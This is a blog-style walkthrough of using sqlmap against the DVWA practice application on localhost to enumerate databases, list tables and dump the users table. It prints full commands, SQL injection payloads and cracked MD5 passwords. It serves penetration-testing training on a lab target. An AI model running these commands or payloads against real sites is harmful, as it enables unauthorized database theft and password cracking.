Extract Database With Sqlmap

Bismlillah...

Hello, buddy! have ever think why Oracle Corp will monopolize and commercialize Mysql? While many people already depended on it in their development. You do not need to answer it, seriously. Coz now we aren't going to talk about that, but we're gonna talk about how to use Sqlmap to extract database.

Assumption:

• You have apache2, mysql, phpmyadmin instaled on your system.
• I use DVWA for victim site, click here for more information and download link.
• You have found the vulnerable from DVWA site. Click here for tutorial.
• I use Mantra and Burp Suite for IG(Information Gathering). Click here for tutorial!. Important to find the cookie.

Open your teminal and go to sqlmap directory "cd /pentest/database/sqlmap/" or use gnome menu.
So let's rock, here's the step:

1. First read the manual by typing "./sqlmap -h".
2. If you are already knew about the usage, let's continue. Here's the syntax "./sqlmap.py -u victim_url --cookie=Cookie --dbs" if the targeted website has login page we have to find the cookie, we can use Burp Suite. But if no, just go to vurnerable webseite immediately "./sqlmap.py -u victim_url  --dbs". Realize the differences among the the syntaxes, "-u" for url and "--dbs" for capturing database name. In my case will be like this:
   

   ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" --dbs

Open :




    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org


[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program


[*] starting at 17:17:09


[17:17:10] [INFO] resuming back-end DBMS 'mysql' 
[17:17:10] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit


    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit


    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit


    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
---


[17:17:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[17:17:10] [INFO] fetching database names
[17:17:10] [WARNING] reflective value(s) found and filtering out
available databases [6]:
cacti
[*] dvwa
[*] information_schema
[*] mysql
[*] nowasp
[*] owasp10


[17:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at 17:17:10
Can you see the databases? Now guess which the related one is. Yeah you are right, dvwa is the one that we are looking for :D
3. We got the database name now "dvwa", the next duty is to get the tables name.

/sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -D dvwa --tables

Open :


sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:37:07

[17:37:07] [INFO] resuming back-end DBMS 'mysql'
[17:37:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
---

[17:37:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[17:37:08] [INFO] fetching tables for database: 'dvwa'
[17:37:08] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[17:37:08] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 17:37:08
Sure, you can see those tables name, nothing left to do just dumping that users table.
4. Don't be happy, we still get things to do.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -T users --dump

Open :



   sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:38:00

[17:38:01] [INFO] resuming back-end DBMS 'mysql'
[17:38:01] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
---

[17:38:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[17:38:01] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[17:38:01] [INFO] fetching current database
[17:38:01] [WARNING] reflective value(s) found and filtering out
[17:38:02] [INFO] fetching columns for table 'users' in database 'dvwa'
[17:38:02] [INFO] fetching entries for table 'users' in database 'dvwa'
[17:38:02] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] Y

[17:38:19] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1

[17:39:26] [INFO] using default dictionary
[17:39:26] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y

[17:39:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[17:39:29] [INFO] starting 4 processes
[17:39:35] [INFO] cracked password 'abc123' for user 'gordonb'              
[17:39:37] [INFO] cracked password 'charley' for user '1337'                
[17:39:42] [INFO] cracked password 'letmein' for user 'pablo'                
[17:39:45] [INFO] cracked password 'password' for user 'admin'              
[17:39:50] [INFO] postprocessing table dump                                  
Database: dvwa
Table: users
[5 entries]
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                                           | password                                    | last_name | first_name |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | http://localhost/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | http://localhost/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | http://localhost/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | http://localhost/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+

[17:39:50] [INFO] table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[17:39:50] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 17:39:50
Viola.... the usenames and password appear.. it seems the passwords are encrypted (md5 maybe). Your last duty to solve it :P